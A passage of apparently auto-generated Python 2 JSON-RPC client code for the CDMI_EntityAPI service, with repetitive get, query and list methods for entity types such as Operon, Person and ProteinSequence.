request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Model(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Model',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_OTU(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_OTU',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_OTU(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_OTU',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_OTU(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_OTU',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ObservationalUnit(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ObservationalUnit',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ObservationalUnit(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ObservationalUnit',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ObservationalUnit(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ObservationalUnit',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Ontology(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Ontology',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Ontology(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Ontology',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Ontology(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Ontology',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Operon(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Operon',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Operon(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Operon',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Operon(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Operon',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_PairSet(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_PairSet',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_PairSet(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_PairSet',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_PairSet(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_PairSet',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Pairing(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Pairing',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Pairing(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Pairing',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Pairing(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Pairing',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Parameter(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Parameter',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Parameter(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Parameter',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Parameter(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Parameter',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Person(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Person',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Person(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Person',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Person(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Person',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Platform(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Platform',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Platform(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Platform',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Platform(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Platform',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ProbeSet(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ProbeSet',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ProbeSet(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ProbeSet',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ProbeSet(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ProbeSet',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_ProteinSequence(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_ProteinSequence',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_ProteinSequence(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_ProteinSequence',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_ProteinSequence(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_ProteinSequence',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Protocol(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Protocol',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server:' +
ret.code)
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Protocol(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Protocol',
'params': [qry, fields],
